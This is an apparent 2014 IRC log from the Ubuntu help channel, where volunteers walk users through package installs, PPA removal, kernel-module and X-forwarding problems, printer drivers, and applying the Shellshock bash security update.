[14:00] <Carl_> Geirha dpkg gives me a list of commands I can execute with dpkg. TJ- hash doesn't display the command I'm trying to use
[14:00] <geirha> Carl_: not dpkg, type dpkg   "type" is a builtin command
[14:00] <geirha> I even added quotes around it to emphasize that it was a command ...
[14:00] <Carl_> Oh, my bad.
[14:00] <Carl_> Missed it
[14:01] <geirha> Carl_: Though that means it finds and runs dpkg
[14:02] <pax2you> thx for modem...mmcli -L--> no modem were found and lpci didnt' found a modem...but i see the port on the left of laptop
[14:02] <TJ-> pax2you: It is probably a 'Win' modem, requiring a software driver... Linmodem used to provide free and paid-for versions of those
[14:03] <Carl_> geirha dpkg has been hashed. Command still not work
[14:03] <Carl_> Command still not working* returns error no such files or directories
[14:03] <geirha> Carl_: so you are running dpkg -i somefile  and it can't find somefile, right?
[14:03] <Carl_> Correct
[14:04] <geirha> which indicates that you've either mistypted the filname or missing the path to it
[14:04] <pax2you> TJ-: ok i've tried to download scanmodem from http://132.68.73.235/linmodems/index.html#scanmodem but the link don't work
[14:04] <Carl_> That's my understanding but I've copied the path exactly multiple times to no avail
[14:04] <TJ-> pax2you: See http://www.linmodems.org/
[14:04] <geirha> Carl_: copied from where?
[14:05] <TJ-> Carl_: Are you passing dpkg a path to a .deb file?
[14:05] <pax2you> TJ-: it's same.
[14:05] <pax2you> TJ-: linmodems.org is http://132.68.73.235/linmodems/index.html#scanmodem
[14:06] <Carl_> TJ- yes. Copied path directly from the files properties. Anyways, might just reboot the system unlikely but perhaps it might just work
[14:07] <Carl_> Thanks for the help guys
[14:07] <Carl_> Really do appreciate it
[14:07] <geirha> Carl_: try this, type in the terminal:  dpkg -i    with a space after -i but do not hit enter. Then drag the dpkg file from the file browser and drop it on the terminal
[14:08] <geirha> *drag the deb file
[14:08] <geirha> err well, you'll need sudo in front too.  sudo dpkg -i
[14:09] <bloodnut> after doing add-apt-repository I decided to remove it but when I'm doing --remove it returns "add-apt-repository: error: no such option: --remove"
[14:09] <bloodnut> any ideas?
[14:09] <k1l> bloodnut: use ppa-purge
[14:09] <Carl_> Hmm fixed it. Thanks again
[14:10] <TJ-> pax2you: I'm not sure that's the site I'm remembering - the one I recall made a business selling the HSP driver code they'd licensed, but I thought they were called linmodem
[14:10] <Carl_> I think my usr was corrupted. Logged out and changed user started working perfectly
[14:13] <pax2you> TJ-: so i can't use the modem? It's not very important it's just to finish the page i'm writing here: http://wiki.ubuntu-it.org/Hardware/Notebook/HpCompaq6720s
[14:15] <TJ-> pax2you: Not easily, since 99.9% of internal PC modems require Host Signal Processing (aka a driver) to function... one of the FOSS HSP drivers may support it, but it can be hard to figure it out
[14:15] <bloodnut> k1l, ppa-purge tried to update the packages (but it returned 404 - that's the reason I wanted to remove the ppa in the first place) but it says the ppa isn't found. how can that be if I just added it?
[14:16] <k1l> "ls -al /etc/apt/sources.list.d" will list all PPAs
[14:18] <bloodnut> is it safe to jsut delete the unnecessary source list?
[14:18] <MonkeyDust> bloodnut  comment them ou, with a #, so can eadsily repair it
[14:18] <MonkeyDust> typos*
[14:19] <pax2you> TJ-: ok thx for all dear. it isn't a easy problem to solve. Now i have to go. :)
[14:19] <bloodnut> I don't need to repair. I need to completely get rid of it
[14:20] <MonkeyDust> bloodnut  when you're sure it's harmless, you can still delete them
[14:21] <bloodnut> alright. much obliged.
[14:26] <UnixBird> hi everyone
[14:28] <guzzi_jones> grimlock1182, just use the entire disk and lvm
[14:30] <Grimlock1182> guzzi_jones, oH!!! i already choose the entire disk only..
[14:32] <guzzi_jones> redo it.
[14:32] <guzzi_jones> you want lvm
[14:33] <guzzi_jones> basically with lvm you get the best of everything
[14:33] <guzzi_jones> that is why it is default on some linux variants
[14:33] <guzzi_jones> i initially made the same mistake as you
[14:39] <UnixBird> I have a question about a problem connecting to phpmyadmin, it's possible ?
[14:41] <MonkeyDust> UnixBird  ask and wait
[14:41] <UnixBird> ok, thanks you.
[14:42] <Tato> Hello. I'm an absolute beginner when it comes to doing anything on the computer so I'd appreciate some help. I'm running ubuntu 14.04. I'm trying to use the following instructions" login as root then go to /etc/ld.so.conf.d now create vlc.conf conf file just need this:  /usr/lib" could anyone write the commands to do this?
[14:43] <MonkeyDust> Tato  what are you trying to do?
[14:44] <Tato> I'm missing a lot of libqt-network libqt core etc and I read that following those instructions fixes the broblem MonkeyDust
[14:45] <UnixBird> I can barely get connected to phpmyadmin, I do not remember my password. I saw on the internet that I had to change the conf.inc.php file but it is empty. It is in my usr/share/phpmyadmin directory. What should I do ?
[14:46] <MonkeyDust> Tato  what problem would that be? why do you need all that?
[14:47] <Tato> I need them because I'm trying to install a program through dpkg and it fails because I'm missing thiose packages
[14:47] <TCMSLP> argh - any help appreciated
[14:48] <TCMSLP> 14.04 install, goes smoothly, but grub fails to boot
[14:48] <TCMSLP> /dev/dsk/by-uuid/blah does not exist
[14:48] <TCMSLP> yet, boot off live USB and the path does exist
[14:48] <TCMSLP> I've tried reinstalling, tried boot-repair
[14:48] <MonkeyDust> Tato  and what package is that?
[14:49] <Tato> Virtualbox
[14:49] <k1l> Tato: please give more details, what ubuntu exactly? what package, etc etc
[14:49] <Tato> Oh the packages I'm missing
[14:49] <k1l> Tato: why not "sudo apt-get install virtualbox"?
[14:49] <MonkeyDust> Tato  try sudo apt-get install virtualbox
[14:49] <k1l> !info virtualbox
[14:49] <MonkeyDust> k1l  was faster
[14:50] <Tato> Never thought of doing it like that. I downloaded it from their website. I'll give it a try
[14:50] <k1l> Tato: first rule is to use what ubuntu ships in the official repos
[14:50] <marc87> hey guys, probably off-topic, but if I switch distros, do I have to download all the steam games in my library again?
[14:50] <rawtaz> hi. i've changed to old-releases.ubuntu.com in my sources.plist for my 13.04 raring ringtail, then ran apt-get update, but apt-get install --only-upgrade bash tells me that there's no newer bash available. is this because patches arent provided for this version of ubuntu anymore?
[14:51] <k1l> rawtaz: there is no update
[14:51] <Tato> Works perfect. Thanks kll and MonkeyDust
[14:51] <k1l> rawtaz: that is the thing when you use a EOL release
[14:51] <SchrodingersScat> marc87: if it's in your /home/ or some other storage outside of / and you don't overwrite it, I would hope you could point steam to it.  Shouldn't be a problem in /home/ really, something in /media/ might need you to tell steam
[14:51] <rawtaz> k1l: i take it that is a yes to my question?
[14:52] <k1l> rawtaz: you need to upgrade to 14.04 (with the 13.10 step inbetween)
[14:52] <SchrodingersScat> marc87: like, I imagine it might ask you to install the game, then when you choose the location if it's the same directory then it should just update..should.
[14:52] <Gear_> I'm installing ubunti 14.14.1 on a hp zd8000 laptop, the progress bar gets stuck at "configuring bcmwl-kernel-source"
[14:53] <rawtaz> k1l: i'll see if apt-get upgrade works :-)
[14:53] <Gear_> how much longer should I wait? it's a p4 with 2gb ram and other god specs
[14:53] <k1l> rawtaz: "sudo do-release-upgrade" is to upgrade to 13.10 and after that to 14.04
[14:53] <k1l> Gear_: p4 is old
[14:53] <k1l> Gear_: how long did you wait so far?
[14:53] <rawtaz> k1l: oh ok. thought it was the same as in debian. i shouldnt assume so much :)
[14:53] <rawtaz> k1l: thanks
[14:53] <Gear_> it runs off the usb fine so far
[14:54] <Gear_> I've waited about 20 minutes
[14:54] <Gear_> the bar hasn't moved, the screen saver went black a couple of times at least
[14:54] <k1l> rawtaz: yes, there are some differences.
[14:54] <rawtaz> k1l: havent i met you in the derby channel before?
[14:55] <k1l> rawtaz: dont think so :)
[14:55] <rawtaz> ok :D
[14:55]  * rawtaz eyes k1l 
[14:58] <Gear_> can I interrupt this gui installer to see a text mode of where it's frozen at?
[14:58] <skinux> Are there any file/directory copying tools that show a progress bar and how much longer it should take?
[14:58] <Gear_> I loaded the usb in "try" mde, then used install ubuntu from there
[14:59] <marktaff> hi all
[14:59] <MonkeyDust> skinux  rsync --progress
[14:59] <antonio__> how much ram to install ubuntu ?
[14:59] <skinux> rsync for locally copying/moving files?
[14:59] <skinux> I thought that stood for Remote Sync?
[15:00] <MonkeyDust> skinux  you can use it locally too
[15:00] <Mastermind_> #server
[15:00] <Sevet> antonio__: https://help.ubuntu.com/community/Installation/SystemRequirements
[15:01] <antonio__> how much ram do i need to install ubuntu ?
[15:01] <MonkeyDust> !requirements | antonio__ start here
[15:01] <Tato> I just installed virtualbox. The only problem is that I have no idea where it was saved to , anybody can help?
[15:02] <marktaff> I sequentially dist-upgraded an old laptop from 12.10 to 14.04. Old kernel 3.5, new kernel 3.13. It has broadcom wired and wireless chips, and neither work with new kernel, and probably other hw as well.
[15:02] <skinux> I've also noticed that there is no really good wireless connection manager (GUI) app.
[15:02] <MonkeyDust> Tato  probably /usr/bin/ ... but why do you want to know?
[15:02] <skinux> I'd like to have something in the panel, such as there is for Windows. However, I have yet to find the functionality, at least for KDE.
[15:03] <Tato> I'm running it from a gui so I want open it
[15:03] <TCMSLP> ugh reinstalled again and still can't find disk by uuid
[15:03] <TJ-> skinux: the plasma-network-manager applet works fine for Wifi and all other NM connection types
[15:03] <skinux> Also...I can't seem to stop screenlets manager from automatically starting with the system.
[15:03] <marktaff> with 3.13 kernel, lsmod only shows about 12 modules, 3.5 kernel shows about 30 modules.  Anyone have any ideas on how to fix this?  Thanks
[15:04] <k1l> Tato: what ubuntu are you on?
[15:04] <Tato> 14.04
[15:04] <k1l> unity?
[15:04] <Tato> Lxde
[15:04] <TJ-> marktaff: What modules are missing? many of the most common modules are built-in to the kernel image to keep boot-times fast
[15:04] <cool_boy> hello there! if it is possible to recover directory delete from terminal, I accidentally deleted wrong directory through terminal :s
[15:05] <k1l> Tato: that should have something like a program menu
[15:05] <k1l> Tato: or press "alt+f2" and then type virtualbox and press enter
[15:06] <MonkeyDust> Tato  below left is the menu in lxde, look there for virtualbox
[15:06] <kyle__> Does the ubuntu installer support the partman/early_command?  I'm not having much luck with it.
[15:06] <marktaff> TJ: almost all of them.  I'm thinking some way to force hardware detection, kernel reinstall etc.  I can post the lsmod output, but give me a min to usb drive it off the laptop. :-)
[15:06] <Tato> My god I'm so bad all this. Practice makes perfect thanks k11
[15:06] <TJ-> marktaff: My point is, are you sure the modules you expect to be dynamically loaded aren't built in to the kernel image?
[15:08] <marktaff> TJ:yes, I'm sure.  I have another box (this one) and it has about 30 mods loaded as well
[15:09] <hncnae> \pa
[15:09] <Gear_> the installation progress bar is stuck at configuring bcmwl-kernel-source
[15:09] <friendlyguy> hi there! I've got a problem on some vms running ubuntu. /boot filled up to 100%, tried to remove old kernels via apt, not possible due to dependencies.?!
[15:10] <Gear_> is there a way of finding out why it's stuck?
[15:10] <asarkar> hello all
[15:10] <asarkar> I need some regarding python
[15:10] <asarkar> I am new to this channel
[15:10] <asarkar> anyone there for help!!!
[15:11] <TCMSLP> try asking - you may be lucky
[15:11] <TCMSLP> or unlucky
[15:11] <asarkar> thanks
[15:12] <Rory> Could somebody please confirm md5sum: e9d7412106a7a41822b06ecaa711c940  /var/cache/apt/archives/bash_4.3-7ubuntu1.3_amd64.deb
[15:12] <asarkar> I am working on a package pyth 0.6.0
[15:12] <asarkar> to read rtf files using python
[15:13] <SchrodingersScat> Rory: e9d7412106a7a41822b06ecaa711c940  bash_4.3-7ubuntu1.3_amd64.deb
[15:13] <Rory> Good enough for me
[15:13] <Rory> Thanks SchrodingersScat
[15:13] <marktaff> TJ: http://paste.kde.org/p5oys4k9l
[15:13] <asarkar> hello all
[15:15] <TJ-> marktaff: First off, "lspci -nnk" would be of more help to you, as it will list the kernel drivers. Second, I'd expect dmesg and/or syslog to give some major clues as to what is causing the differences
[15:17] <k1l> friendlyguy: please show a "ls -al /boot" in a pastebin
[15:17] <TJ-> marktaff: Also, using kernel 3.13 what does "cat /proc/modules | wc -l" report?
[15:18] <marktaff> TJ: lspci -nnk shows some hw with kernel drivers, but not either network card or audio
[15:19] <TJ-> marktaff: can you pastebin "/var/log/dmesg" ?
[15:19] <marktaff> TJ:cat /proc/modules reports 15 lines
[15:19] <marktaff> TJ:sure, give me a min to collect it off the laptop
[15:20] <TJ-> marktaff: I'm almost convinced there's a Xen hypervisor running on bare metal there, and a minimal dom0
[15:25] <marktaff> TJ: http://paste.kde.org/pagefiqky
[15:25] <trustnothing> query about redirecting output
[15:25] <trustnothing> I have a script where I want to redirect any errors into another command
[15:25] <trustnothing> say I'm using cp
[15:25] <trustnothing> I thought this should work, but it doesn't:
[15:26] <trustnothing> cp "src" "dest" 2>&1 | othercommand
[15:26] <trustnothing> anyone able to tell me why?
[15:27] <marktaff> TJ: it does look by dmesg like something has gone horribly wrong :-)
[15:29] <TJ-> marktaff: Yes :) First thing is some systemd/HAL bits, but I notice that BIOS has disabled VT (for KVM), which for v3.5 was enabled/loaded - which suggests BIOS settings may have changed to influence things somewhat, too
[15:30] <trustnothing> I've tested it in a case where there the specified source is missing
[15:30] <trustnothing> it should say
[15:30] <trustnothing> cp: cannot stat 'src': no such file or directory
[15:30] <trustnothing> but the other command doesn't receive that string at all
[15:30] <Linnak> Hi is that a way to make an ISO format backup from my system?
[15:32] <marktaff> TJ: Hmm.  That would be odd.  If I reboot with the 3.5 kernel, it works.  If the bios changed, wouldn't we expect the changes to affect both kernels?
[15:33] <rangeles2276> How can I fix my update my bash shell when I try to do sudo apt-get update && sudo apt-get upgrade nothing happens
[15:33] <rangeles2276> I have also done sudo apt-get autoclean and sudo apt-get autoremove but nothing it still says my server is vulnerable
[15:34] <TJ-> marktaff: Indeed :)
[15:34] <rangeles2276> I'm running 12.o4 LTS
[15:34] <TJ-> marktaff: Hence my comment about it feeling like a Xen hypervisor boot environment
[15:35] <frog> hi. how can I see if my torrent prgramm is working right? i soemhow haven't been connected to such much peers.. http://snag.gy/H4EO3.jpg how can i see if the right ports are open or not? or am i doing something else wrong?
[15:35] <marktaff> TJ: http://superuser.com/questions/753806/systemd-udevd381-failed-to-execute-lib-udev-socket-org-fre-edesktop-hal-u
[15:35] <marktaff> going to try this, sounds hopeful
[15:37] <reisio> frog: the way bittorrent works is the seeders with the best connections are seeded from first
[15:37] <magesing> Hi everyone, I just ran the software updater... it prompted me to restart, I did,  but now when I log in my display manager doesn't seem to start properly ( I don't get a taskbar etc.) Help please.... how do I go about diagnosing/fixing this?
[15:37] <reisio> frog: so if you have an ordinary residential network, you won't be seeding as much
[15:37] <TJ-> marktaff: I thought HAL went away many releases ago
[15:37] <frog> reisio: that just means that my inet is too "slow"?
[15:37] <marktaff> TJ: could be, this laptop had 12.10 on it 8 hours ago. :-)
[15:38] <reisio> frog: or others' are much faster, if you prefer
[15:38] <rww> rangeles2276: run apt-cache policy bash, tell us what the "Installed:" line says
[15:38] <frog> reisio: ok. but i just think there are in other countrys and thats why am too "slow". thanks
[15:39] <reisio> frog: likely would be mostly like that in any country
[15:39] <reisio> frog: when corporate grade hardware and access is seeding the same thing, you won't be seeding as much
[15:39] <trustnothing> actually I've found the problem
[15:40] <trustnothing> now I have a new problem
[15:40] <frog> reisio: what does corporate grade hardware mean?
[15:40] <reisio> frog: bigger pipes
[15:41] <frog> reisio: ok
[15:42] <trustnothing> solved the new one too :P
[15:42] <trustnothing> man, you guys are magic, you solve my problems without even saying anything.
[15:42] <reisio> trustnothing: yw
[15:44] <Guest15878> .
[15:47] <ABDU1989> Possible definition of this card
[15:47] <ABDU1989>  http://intexuae.com/index.php/products/satellite-tv-box-usb-2-0-intex-it-220dvb-s/
[15:48] <ldiamond> Something could be added to the topic for shellshock updates.
[15:48] <rww> It could be, but the solution is "do security updates as normal", so...
[15:49] <ldiamond> on my end, I had to manually start the update manager
[15:49] <reisio> your end is abnormal :)
[15:49] <rww> if I recall correctly, the default setting for security update checks is daily or more frequently
[15:49] <ldiamond> Yea well, I don't know, I still get the stupid popup about unbutu one closing in june 2014.
[15:50] <ldiamond> rww, on it does check it, but I didn't get a popup or an update icon
[15:50] <ABDU1989> Possible definition of this card
[15:50] <ABDU1989>  http://intexuae.com/index.php/products/satellite-tv-box-usb-2-0-intex-it-220dvb-s/
[15:50] <Talidan> hey guys, im trying to do something via ssh, but i get the error "xprop: unable to open display ''"
[15:50] <Talidan> What does that mean?
[15:51] <Talidan> i'm trying to read up on it, something to do with not forwarding GUI events to ssh or something?
[15:51] <ldiamond> It means you're trying to open a GUI software but you don't have proper x forwarding setup
[15:51] <marktaff> TJ: it didn't work, but it did get rid of all the hal errors in dmesg
[15:51] <Talidan> im a noob more or less
[15:51] <ldiamond> What are you running from ssh?
[15:51] <Talidan> xforwarding is forwarding events to text ssh?
[15:51] <ikonia> Talidan: it means you're not able to connect to the X display (window manager)
[15:51] <Talidan> I'm trying to get teamviewer running.  It has a command line interface, even if i cant see the window
[15:52] <Talidan> if this doesnt work i'll try vnc afterwards
[15:52] <thresh> When will updated AMI (w/ shellshock fix) hit the shelves of Amazon EC2 ?
[15:52] <thresh> It's still unfixed there.
[15:52] <Talidan> http://www.tonisoto.com/2013/07/launching-teamviewer-remotely-throught-ssh/ i'm following this
[15:52] <ldiamond> I don't know team viewer, but if you're running it correctly in cli mode, it still, for some reason, requires an x server
[15:52] <cfhowlett> thresh, probably need to ask amazon, eh?
[15:53] <ldiamond> add -X to your ssh command line.
[15:53] <thresh> cfhowlett: no, it's canonical who manages those images.
[15:53] <Eremo> Can someone help me to configure ubuntu keyboard as Spanish? I have tried all. In server 14...
[15:53] <Eremo> there is no way to make ñ key working or accents like ´ á é
[15:53] <Talidan> alright, i'll try installing an x server
[15:54] <ldiamond> don't you already have one?
[15:54] <ABDU1989> I need drivers for this card
[15:54] <ABDU1989>  http://intexuae.com/index.php/products/satellite-tv-box-usb-2-0-intex-it-220dvb-s/
[15:54] <Eremo> Ive tried diferent encoding types , keyboard-configuration, console-data reinstall and config... nothing its working, also tried loadkeys...
[15:54] <Talidan> on windows (please dont hate :D), migrating things over
[15:55] <ldiamond> thresh, I'd run updates on the vms on boot so they'll get fixed
[15:55] <kyle__> Eremo: https://help.ubuntu.com/community/ComposeKey
[15:55] <soulisson> Hi, i'm trying to install comodo antivirus on my computer, but i have the following error: modprobe: FATAL: Module redirfs not found. The linux-headers package is installed for my kernel version, any idea how to solve this problem please ?
[15:55] <thresh> ldiamond: sure.
[15:56] <thresh> ldiamond: that's still not what I'm asking :)
[15:56] <Eremo> kyle__ then i must give up of having an spanish regular keyboard? like in any other computer?
[15:56] <kyle__> And your fallback is Ctrl+Shift+U and typing the unicode code point
[15:56] <ldiamond> I don't think anyone here knows when they will be updated.
[15:56] <Eremo> i must be coding every spanish character in a combination key, is really that the solution?
[15:57] <Eremo> i mean... why isnt spanish keymap working? :S
[15:57] <kyle__> Eremo: Is it a spanish language keyboard or a us keyboard?
[15:57] <Eremo> its spanish keyboard
[15:57] <ABDU1989> Is there a solution
[15:58] <kyle__> Eremo: Try in ubunut-es.  They probably have dealt with it more than folks in here.  It __should__ be just choosing the keyboard/keymap.
[15:58] <Eremo> oki k1l
[15:58] <Eremo> sorry, kyle__
[15:59] <Talidan> great thanks ldiamond...seem to be getting smoewhere
[15:59] <Eremo> problem its i have already tried loadkeys es, and wont work, ill try in that channel
[15:59] <Eremo> ubuntu-es
[15:59] <Talidan> i've never not used command line shell before, this is new to me
[15:59] <Talidan> So, i just booted a GUI app through ssh.  The instance is still within the server, right? i'm a bit confused
[15:59] <Linnak> Hi, which application can make a backup imagefile from a running system?
[16:00] <kyle__> NP.  Good luck!
[16:00] <jhutchins> Talidan: http://tldp.org/HOWTO/DOS-Win-to-Linux-HOWTO.html http://www.linuxcommand.org/ https://help.ubuntu.com/community/BasicCommands http://www.macdevcenter.com/pub/a/mac/2005/05/20/terminal1.html http://www.ischool.berkeley.edu/~kevin/unix-tutorial/toc.html  http://linuxcommand.org/lc3_learning_the_shell.php  http://linuxcommand.org/tlcl.php
[16:00] <Talidan> thanks, i'll check those out
[16:02] <TJ-> thresh: I've asked in #ubuntu-server for you; you might want to join that channel to see any response
[16:03] <thresh> TJ-: great, thank you!
[16:03] <TJ-> thresh: and we have a response
[16:05] <ldiamond> Talidan, -X means X11 Forwarding enabled. This means all X11 communication will go through the SSH tunnel up to your local X server. I.e. the gui is displayed locally, but the software runs on the server.
[16:05] <Talidan> i see
[16:05] <Kurlon> Am I correct in assuming there won't be a backport of the patch to 8.10?
[16:05] <ldiamond> shellshock?
[16:05] <Kurlon> Sorry, 'shell shock' bash patches that is.
[16:06] <rww> Kurlon: correct
[16:06] <ldiamond> Good question, but since there's no support I'd assume not.
[16:06] <TJ-> Kurlon: 8.10 was EOL a long time ago
[16:06] <Pici> in 2010.
[16:06] <ldiamond> Though they might decide to push one still, given how major it is.
[16:06] <rww> (just like there wasn't one for heartbleed, or any other security vulnerability in the last 4 years)
[16:06] <rww> ldiamond: nope, they won't
[16:08] <rangeles2276> rww this is what I got
[16:08] <rangeles2276> rww bash:
[16:08] <rangeles2276>   Installed: 4.2-2ubuntu2
[16:08] <rangeles2276>   Candidate: 4.2-2ubuntu2
[16:08] <rangeles2276>   Version table:
[16:08] <rangeles2276>  *** 4.2-2ubuntu2 0
[16:08] <unopaste> rangeles2276 you have been muted for 60 seconds as it looks like you are pasting lots of lines into the channel, please use http://paste.ubuntu.com and paste just the URL of your data here when you are unmuted
[16:08] <rww> and that's why I said just the Installed: line :|
[16:09] <rangeles2276> rww my bad
[16:09] <TJ-> ldiamond: if you're still running an 8.10 server then bash is the last of your worries!
[16:10] <jhutchins> rww: There are so many other security problems with 8.10 that it would be pointless to upgrade just bash.
[16:10] <rww> jhutchins: yes, that was my point
[16:10] <rww> rangeles2276: hrm. can you put the whole thing in http://paste.ubuntu.com/ and link the page it creates here?
[16:11] <rangeles2276> rww this is all I got http://paste.ubuntu.com/8433922/
[16:13] <TJ-> rangeles2276: The package that completes the fix for CVE 7169 is "4.2-2ubuntu2.3" - you don't have that. What archive mirror is that system aimed at ("grep 'archive' /etc/apt/sources.list") ?
[16:14] <Kurlon> Based on current known issues, the only vuln on my 8.10 boxes is bash via apache cgi handling.
[16:14] <ldiamond> TJ- I'm not, someone else asked that.
[16:14] <Kurlon> Looks like I get to roll my own packages.
[16:14] <ldiamond> Or upgrade?
[16:14] <TJ-> ldiamond: apologies, that was aimed at Kurlon but my eyes skipped a line
[16:15] <rangeles2276> rww http://paste.ubuntu.com/8433950/
[16:15] <Kurlon> ldiamond: Love to, don't have the resources to rebuild those systems on new bases at this time.
[16:16] <TJ-> rangeles2276: That looks correct, so "sudo apt-get update && sudo apt-get dist-upgrade" should ensure that system has the latest packages
[16:17] <rangeles2276> TJ- I have done this so many times I have lost count
[16:17] <ldiamond> Kurlon, maybe arch linux's rolling releases would be better suited for your environment then
[16:17] <TJ-> rangeles2276: Are you behind a HTTP proxy ?
[16:18] <rangeles2276> nope
[16:18] <sp3ck> hi, have anyone heard about a complete shellshock patch??
[16:18] <rangeles2276> TJ- the other server which is sitting on the same place updates just fine
[16:18] <Technicus> Hello, I am trying to duplicate a cd with dd if=/dev/sr0 of=cdimage.iso.  But it only goes to 1.8mb and stops.  I have tried if=/dev/cdrom and if=/dev/cdrw but all have same result.  Is there a different device that I should set as the in file?
[16:18] <Kurlon> ldiamond: That'd be even more pain.  I love me some arch on my arm boxes, but it's not an ideal fit for our production env.
[16:18] <MisterCoinMC> Hey guys. Got a QQ. In the past, I know that CD-RW were not the best. I am dual booting Ubuntu on my osx system, and it doesnt like USB drives apparently. Do you think i'll have any troubles if I use a DVD-Rw for the install?
[16:19] <TJ-> rangeles2276: according to your 'grep' there is no entry for the "precise-security" repo
[16:19] <rangeles2276> TJ- How can I add this?
[16:19] <TJ-> rangeles2276: compare the sources.list of those two systems. it looks like this system is missing some entries
[16:19] <rangeles2276> TJ- is there a command you guys can give me
[16:19] <ajay_> kik on ubuntu
[16:20] <ajay_> wats the procedure
[16:20] <MisterCoinMC> anyone?
[16:20] <jhutchins> MisterCoinMC: It depends on whether the hardware can handle that medium and boot from it, but a Mac should do fine.
[16:20] <MisterCoinMC> hmm
[16:20] <MisterCoinMC> Okay, ill give it a shot
[16:20] <jhutchins> MisterCoinMC: Many installs were done from disk long before USB installs were possible.
[16:20] <TJ-> rangeles2276: It might be as simple as adding "deb http://archive.ubuntu.com/ubuntu precise-security main universe multiverse restricted"
[16:20] <MisterCoinMC> I do ahve normal CD-R here, but the xubuntu install iso is over 900MB
[16:21] <MisterCoinMC> so 'ill give it a whirl
[16:21] <ajay_> how we can install kik messanger in ubntu
[16:21] <MonkeyDust> for those who are worried about shellshock: http://www.linuxbsdos.com/2014/09/25/bash-susceptible-to-environment-variables-code-injection-attack/
[16:21] <k1l> ajay_: do they have a linux client?
[16:22] <ajay_> i dont know
[16:22] <ajay_> tell buddy
[16:22] <k1l> ajay_: so ask the kik guys first
[16:22] <ajay_> frm where
[16:22] <MonkeyDust> ajay_  find a linux client for this program that nobody knows, then ask again
[16:23] <ajay_> thanks dude
[16:23] <ajay_> thanks kll ,,,monkey dust
[16:25] <LuchaLibre> Hello! I need help installing my Samsung ML 2165 printer
[16:28] <LuchaLibre> Hello?
[16:29] <LuchaLibre> I would like help installing my Samsung ML 2165W printer.
[16:29] <minimec> LuchaLibre: your printer is supported by the 'Samsung Unified Linux Driver'. There seems to be a repositrory for debian/ubuntu systems... http://www.bchemnet.com/suldr/
[16:29] <LuchaLibre> minimec: I have installed it, it asks for a rasterspl thing
[16:29] <LuchaLibre> I have no clue what that is
[16:29] <LuchaLibre> I tried a fix for it on the forums but that didn't work either
[16:29] <minimec> LuchaLibre: neither do I... sorry.
[16:30] <Benne18> hallo
[16:31] <TJ-> LuchaLibre: I use suldr here, with a different model, it works fine. Did you install/configure the driver via CUPS admin web pages?
[16:31] <rangeles2276> TJ- thanks a bunch this thing had 577 updates
[16:31] <rangeles2276> rww thanks a bunch this thing had 577 updates
[16:31] <TJ-> rangeles2276: Phew!
[16:32] <LuchaLibre> TJ-: I downloaded the .tar.gz, used the PPD for my specific series, in the Printer application and it then said I needed something called rasterspl in order for it to work
[16:33] <TJ-> LuchaLibre: Use the suldr repo that minimec linked you to, that has all the required packages with correct dependencies
[16:34] <LuchaLibre> TJ-: I downloaded it now what?
[16:35] <LuchaLibre> TJ-: Now what do I do? I'm not too familiar with this end of Linux, and I would like some help :3
[16:36] <daniel_> hello guys
[16:36] <LuchaLibre> Hello Daniel.
[16:36] <LuchaLibre> Guten Tag, and that sort of thing. :D
[16:37] <TimeVirus> yo
[16:38] <Zerock|LittleRed> What's the package name for the opengl driver for intel?
[16:38] <LuchaLibre> TJ-: It's asking for a Location, what does that mean?
[16:39] <LuchaLibre> TJ-: Does it mean that I have to lsusb and find it's hardware location, or I have to give it a name?
[16:39] <daniel_> lucha libre.. thanks for replying me
[16:40] <daniel_> i'm currently using ubuntu 13.10 and trying to replace it with 14.04 is provng abortive
[16:40] <LuchaLibre> Abortive? How so?
[16:40] <aasda_> Hello all. One quick question. Do I need SWAP partition if I have 8gb ram? Thanks.
[16:40] <daniel_> i've used both the terminal shell and gui and its not working
[16:40] <daniel_> somthing abt ubuntu doesnt support this version
[16:40] <LuchaLibre> Well, are you updating or are you installing over the old?
[16:41] <Zerock|LittleRed> aasda_: It depends on what you're doing and how much space is on your disk. As a general rule, I set up a swap partition for exactly the size of the amount of RAM in the machine, but that isn't necessarily the best way to do things.
[16:41] <daniel_> updating more like
[16:41] <LuchaLibre> Basically, if upgrade isn't working I would recommend you back up all files important to you, and do a cd install.
[16:41] <k1l> daniel_: sudo do-release-upgrade #to bring you to 14.04
[16:42] <daniel_> i tried to download the file,but i only have limited time on the internet which is not enough to download 982mb if data
[16:42] <LuchaLibre> Daniel: Well Upgrading will take time too...
[16:43] <LuchaLibre> Daniel_: Try to use a public wifi source to download the ISO and burn it to a disc.
[16:43] <aasda_> Zerock|LittleRed, I have 1tb HDD, but I have Win8 for gaming. 250 I left for Ubuntu, 50gb / and the left home and swap if needed. Nothing heavy I would say. I use Ubuntu for my office needs, a bit of programming, browsing and similar.
[16:43] <LuchaLibre> TJ-: Hello?
[16:43] <daniel_> can't load DistUpgradeViewText (unknown locale: en_NG)
[16:43] <daniel_> can't load DistUpgradeViewGtk3 (unknown locale: en_NG)
[16:43] <daniel_> /usr/lib/python2.7/dist-packages/gobject/constants.py:24: Warning: g_boxed_type_register_static: assertion 'g_type_from_name (name) == 0' failed
[16:43] <daniel_>   import gobject._gobject
[16:43] <daniel_> /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:40: Warning: specified class size for type 'PyGtkGenericCellRenderer' is smaller than the parent type's 'GtkCellRenderer' class size
[16:43] <daniel_>   from gtk import _gtk
[16:43] <unopaste> daniel_ you have been muted for 60 seconds as it looks like you are pasting lots of lines into the channel, please use http://paste.ubuntu.com and paste just the URL of your data here when you are unmuted
[16:44] <Zerock|LittleRed> aasda_: As long as you're writing efficient code, none of the basics under Ubuntu should run you out of memory. You're probably fine without it, but I always put it there anyway.
[16:44] <TimeVirus> pastebin is a better solution to flooding
[16:44] <LuchaLibre> daniel_: next time it would be better to ask us how to paste things. XD
[16:45] <TimeVirus> or paste.ubuntu heh
[16:45] <daniel_> hello
[16:45] <TimeVirus> hi
[16:45] <daniel_> so sorry abt that
[16:45] <daniel_> its my first time here
[16:45] <aasda_> OK, I will put some, just in case. Thanks for the advice,
[16:46] <daniel_> hello lucha-libre
[16:46] <LuchaLibre> daniel_: Yes, I believe we figured that bit out. The best way for you to do this is go find a public wifi source, or internet source, and get the ISO for the new OS burnt to a CD. Then install.
[16:46] <daniel_> ok
[16:47] <daniel_> but i only get to browse for abt an hr in a day
[16:47] <daniel_> 1hr30mins max
[16:47] <LuchaLibre> daniel_: Is that a data limit or something?
[16:47] <daniel_> i tried using deluge
[16:47] <daniel_> no .. i'm really busy for now
[16:47] <squinty> daniel_:   or use torrent....it has error checking and resume
[16:47] <daniel_> i dont know how to connect deluge to my firefox
[16:48] <daniel_> i dont know how to use torrent too
